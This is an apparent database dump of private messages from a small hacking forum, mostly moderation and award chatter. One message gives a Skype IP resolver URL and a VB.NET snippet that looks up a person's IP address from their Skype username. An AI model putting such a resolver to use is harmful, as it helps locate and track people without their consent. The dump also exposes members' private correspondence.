`folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('453', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] You will now also be moderating the Forum Games sub-forum. [/quote] Ouu this is good :) this is good news my friend! [/quote] Lol yeah but it\'s that more work for you? [/quote] Not at all. [/quote] Cool. Got some work to do on LH so see you around. Also are you upgraded on HF and do you have a account on ubers? [/quote] Yes I do. http://www.hackforums.net/member.php?action=profile&uid=590811 [/quote] Seems like you like [s]Drums & Bass[/s] bums and boobs. By the way, can you change your usertitle to something else? I mean I will give you something, it will help advertise LH. If you don\'t want to, trust me I don\'t mind at all. [/quote] Sure I guess. [/quote] Change your usetitle to \"wana learn SEing? PM me.\" and when they do PM you, just refer them to LH. [/quote] Alright', '1345771235', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('462', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Quick Request', '0', '[quote=\'t3h jok3r\'] Can you make a thread somewhere except the marketplace saying you have a website with a coding section and you need some Java and VB.net experienced people to contribute on the website. In return you will provide them with a FREE lifetime upgrade. [/quote] I can\'t tonight. I am mobile with 10% battery life. Sorry :(', '1345774872', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('464', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Fuck', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] I locked myself out of my admin account. [/quote] Were you not able to pass through the l33thacking.com:80 popout or the admin login which requires the secret pin? [/quote] I remembered everything except my real Password. [/quote] If you don\'t remember your real password then how did you login to LH forums? [/quote] I do not log out... Also I remembered it just nor the correct variation unroll after 5 tries [/quote] So you remembered your password? [/quote] Yes', '1345782310', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('471', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Skype IP Finder', '0', '[quote=\'iTzIpod\'] [quote=\'HoverCatz\'] [quote=\'iTzIpod\'] Hey I was using your Skype IP Finder.exe program And I got this error! :/ Error: Index was outside the bounds of the array. [/quote] Yeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment. The error comes cuz the Api is down [/quote] What is API? :/ [/quote] An link that returns the Ip', '1345811280', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('472', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Skype IP Finder', '0', '[quote=\'HoverCatz\'] [quote=\'iTzIpod\'] [quote=\'HoverCatz\'] [quote=\'iTzIpod\'] Hey I was using your Skype IP Finder.exe program And I got this error! :/ Error: Index was outside the bounds of the array. [/quote] Yeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment. The error comes cuz the Api is down [/quote] What is API? :/ [/quote] An link that returns the Ip [/quote] Oh. So you can\'t fix it? :/ I really wanted it.', '1345813670', '0', '3', '1345816263', '1', '0', '2', '1345813798'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('478', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Skype IP Finder', '0', '[quote=\'iTzIpod\'] [quote=\'HoverCatz\'] [quote=\'iTzIpod\'] [quote=\'HoverCatz\'] [quote=\'iTzIpod\'] Hey I was using your Skype IP Finder.exe program And I got this error! :/ Error: Index was outside the bounds of the array. [/quote] Yeah ik. I cant edit the tread to say that it doesnt work anymore. I asked Joker to do it, so hes gonna do it in a moment. The error comes cuz the Api is down [/quote] What is API? :/ [/quote] An link that returns the Ip [/quote] Oh. So you can\'t fix it? :/ I really wanted it. [/quote] Cant :( Only way is paying for an Api monthly. Costs like 5 monthly', '1345816263', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('492', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. [/quote] Hey, are u sure normal members can see this? : http://l33thacking.com/forumdisplay.php?fid=53', '1345817615', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('495', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. [/quote] Hey, are u sure normal members can see this? : http://l33thacking.com/forumdisplay.php?fid=53 [/quote] Yup, I just double checked and they can view it. ', '1345817748', '0', '3', '1345819747', '1', '0', '0', '1345819722'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('507', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. [/quote] Hey, are u sure normal members can see this? : http://l33thacking.com/forumdisplay.php?fid=53 [/quote] Yup, I just double checked and they can view it. [/quote] Okay thanks', '1345819747', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('511', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. [/quote] Hey, are u sure normal members can see this? : http://l33thacking.com/forumdisplay.php?fid=53 [/quote] Yup, I just double checked and they can view it. [/quote] Okay thanks [/quote] No problem. By the way, nice signature. ', '1345820192', '0', '3', '1345821105', '1', '0', '0', '1345821076'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('516', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. [/quote] Hey, are u sure normal members can see this? : http://l33thacking.com/forumdisplay.php?fid=53 [/quote] Yup, I just double checked and they can view it. [/quote] Okay thanks [/quote] No problem. By the way, nice signature. [/quote] Thanks ;) How do i get the award SWAG?', '1345821105', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('517', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. [/quote] Hey, are u sure normal members can see this? : http://l33thacking.com/forumdisplay.php?fid=53 [/quote] Yup, I just double checked and they can view it. [/quote] Okay thanks [/quote] No problem. By the way, nice signature. [/quote] Thanks ;) How do i get the award SWAG? [/quote] You have show us how cool you are or show some of your expensive clothes/shoes. You basically have to show how cool you look with expensive stuff. You would need to write your UID somewhere for proof. ', '1345821598', '0', '3', '1345821906', '1', '0', '0', '1345821811'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('518', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Skype API', '0', 'Hey there, here\'s a free Skype Resolver API. URL: [code]blackhatxr.com/skype2.php?skype=[/code] To use, simply put the username of the Skype you wish to resolves after the \"?skype=\" GET in the URL. For example: [code]blackhatxr.com/skype2.php?skype=echo123[/code] [code] Private Sub ReactorButton1_Click_1(ByVal sender As Object, ByVal e As EventArgs) Handles ReactorButton1.Click If (Me.ReactorTextBox1.Text = (\"furioz6\")) Then Me.Label2.Text = \"Black Listed\" Else WebRequest.Create(\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text) Me.Label2.Text = New WebClient().DownloadString((\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text)) End If [/code] Any thanks is appreciated. Enjoy!', '1345821656', '0', '3', '1345821809', '1', '0', '0', '1345821758'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('522', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Skype API', '0', '[quote=\'t3h jok3r\'] Hey there, here\'s a free Skype Resolver API. URL: [code]blackhatxr.com/skype2.php?skype=[/code] To use, simply put the username of the Skype you wish to resolves after the \"?skype=\" GET in the URL. For example: [code]blackhatxr.com/skype2.php?skype=echo123[/code] [code] Private Sub ReactorButton1_Click_1(ByVal sender As Object, ByVal e As EventArgs) Handles ReactorButton1.Click If (Me.ReactorTextBox1.Text = (\"furioz6\")) Then Me.Label2.Text = \"Black Listed\" Else WebRequest.Create(\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text) Me.Label2.Text = New WebClient().DownloadString((\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text)) End If [/code] Any thanks is appreciated. Enjoy! [/quote] lolol xD I just got this api on Hf 20 mins ago :P But thanks! :D Btw, am i able to edit the thread again?', '1345821809', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('524', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. [/quote] Hey, are u sure normal members can see this? : http://l33thacking.com/forumdisplay.php?fid=53 [/quote] Yup, I just double checked and they can view it. [/quote] Okay thanks [/quote] No problem. By the way, nice signature. [/quote] Thanks ;) How do i get the award SWAG? [/quote] You have show us how cool you are or show some of your expensive clothes/shoes. You basically have to show how cool you look with expensive stuff. You would need to write your UID somewhere for proof. [/quote] k. does a Anonymous mask work?', '1345821906', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('525', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Skype API', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] Hey there, here\'s a free Skype Resolver API. URL: [code]blackhatxr.com/skype2.php?skype=[/code] To use, simply put the username of the Skype you wish to resolves after the \"?skype=\" GET in the URL. For example: [code]blackhatxr.com/skype2.php?skype=echo123[/code] [code] Private Sub ReactorButton1_Click_1(ByVal sender As Object, ByVal e As EventArgs) Handles ReactorButton1.Click If (Me.ReactorTextBox1.Text = (\"furioz6\")) Then Me.Label2.Text = \"Black Listed\" Else WebRequest.Create(\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text) Me.Label2.Text = New WebClient().DownloadString((\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text)) End If [/code] Any thanks is appreciated. Enjoy! [/quote] lolol xD I just got this api on Hf 20 mins ago :P But thanks! :D Btw, am i able to edit the thread again? [/quote] You should be able to, please check and let me know. ', '1345821918', '0', '1', '0', '1', '0', '0', '1345822235'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('529', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey. I made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks. [url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url] [/quote] I\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? [/quote] Over 2800 minutes since i made it :p [/quote] I thought there was no time limit for upgraded lol. Anyway, thanks for reporting. [/quote] Hey, are u sure normal members can see this? : http://l33thacking.com/forumdisplay.php?fid=53 [/quote] Yup, I just double checked and they can view it. [/quote] Okay thanks [/quote] No problem. By the way, nice signature. [/quote] Thanks ;) How do i get the award SWAG? [/quote] You have show us how cool you are or show some of your expensive clothes/shoes. You basically have to show how cool you look with expensive stuff. You would need to write your UID somewhere for proof. [/quote] k. does a Anonymous mask work? [/quote] Well umm that\'s unique. OK. ', '1345822066', '0', '1', '0', '1', '0', '0', '1345822243'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('537', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Hey', '0', '[quote=\'iTzIpod\'] Are you the same Apathy that used to play Endacia? [/quote] Nope ', '1345834874', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('542', '55', '82', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Forum', '0', '[quote=\'iTzIpod\'] Are you from a different forum? GK or LF? I think I saw you from a different forum. Or, someone has the same username as you. [/quote] I have been on many, not sure what GK and LF are. I\'m mostly active on HF tho', '1345845777', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('547', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'You have been granted an award.', '0', 'You have been granted the [b]SWAG[/b] award.', '1345847620', '0', '3', '1345848117', '0', '0', '0', '1345848055'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('549', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: You have been granted an award.', '0', '[quote=\'t3h jok3r\'] You have been granted the [b]SWAG[/b] award. [/quote] Thanks :)', '1345848117', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('550', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: You have been granted an award.', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] You have been granted the [b]SWAG[/b] award. [/quote] Thanks :) [/quote] NP. Enjoy!', '1345848191', '0', '1', '0', '1', '0', '0', '1345848510'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('552', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Awards', '0', 'Hey, take a look at my reply: http://l33thacking.com/showthread.php?tid=207', '1345852048', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('553', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Awards', '0', '[quote=\'HoverCatz\'] Hey, take a look at my reply: http://l33thacking.com/showthread.php?tid=207 [/quote] Thanks, but apathy takes care of the awards. Don\'t take me wrong, but I just migrated hosts and something went wrong so need to figure out what and fix it. ', '1345852232', '0', '3', '1345852341', '1', '0', '0', '1345852313'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('555', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Awards', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, take a look at my reply: http://l33thacking.com/showthread.php?tid=207 [/quote] Thanks, but apathy takes care of the awards. Don\'t take me wrong, but I just migrated hosts and something went wrong so need to figure out what and fix it. [/quote] kk, good luck :)', '1345852341', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('557', '67', '2', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Awards', '0', 'Hey :) Joker told me to msg u :P take a look at my reply: http://l33thacking.com/showthread.php?tid=207', '1345852411', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('559', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', 'http://l33thacking.com/member.php?action=profile&uid=82 This user should not have gotten the youtube award from just ripping my video and re uploading it. ', '1345852454', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('562', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] http://l33thacking.com/member.php?action=profile&uid=82 This user should not have gotten the youtube award from just ripping my video and re uploading it. [/quote] I know, but upon request I will remove the award. Only when I get access to my admincp. While migrating, my server fucked up my ACP so I need to fix it. [/quote] I normally wouldn\'t mind but He asked me in PM if he could use my video and I said not if you\'re going to use my video to get the youtube award, He said hes not. And he did. That\'s my problem.', '1345852820', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('563', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Awards', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, take a look at my reply: http://l33thacking.com/showthread.php?tid=207 [/quote] Thanks, but apathy takes care of the awards. Don\'t take me wrong, but I just migrated hosts and something went wrong so need to figure out what and fix it. [/quote] kk, good luck :) [/quote] Thanks for the GL. By the way, I received a complaint from the original YT uploader and would like your award removed. I can\'t deny them because the content is originally theirs. Sorry, but your award will be removed in a few days unless you can upload another video. ', '1345852979', '0', '1', '0', '1', '0', '0', '1345854000'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('566', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] http://l33thacking.com/member.php?action=profile&uid=82 This user should not have gotten the youtube award from just ripping my video and re uploading it. [/quote] I know, but upon request I will remove the award. Only when I get access to my admincp. While migrating, my server fucked up my ACP so I need to fix it. [/quote] I normally wouldn\'t mind but He asked me in PM if he could use my video and I said not if you\'re going to use my video to get the youtube award, He said hes not. And he did. That\'s my problem. [/quote] OK, but if I tell him to take your permission now, would it be OK? [/quote] Aslong ask he doesn\'t have the award from my video I don\'t care. That\'s like me just copying everyones tutorials on here and claiming them as mine.', '1345853321', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('573', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Sorry .', '0', '[quote=\'iTzIpod\'] You have been granted an award. To: iTzIpod You have been granted the Youtube award. Even though you downloaded someone elses work, you made the effort and took out time to specially upload it for LH. [/quote] I have removed the rep, If the award isn\'t gone soon. Ill be checking It will be re updated. I have talked to him about it aswell.', '1345853606', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('574', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'WAIT WAIT WAIT', '0', 'The award thing I told you saying that it will be get removed was not for you. I mistakenly sent it to you. ', '1345853664', '0', '3', '1345854131', '1', '0', '0', '1345854022'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('576', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', 'Alright thank you. Sorry to bother you for this it just got to me in the wrong way. After I discussed with him that he shouldn\'t have the award from my work and he did it anyways.', '1345853668', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, 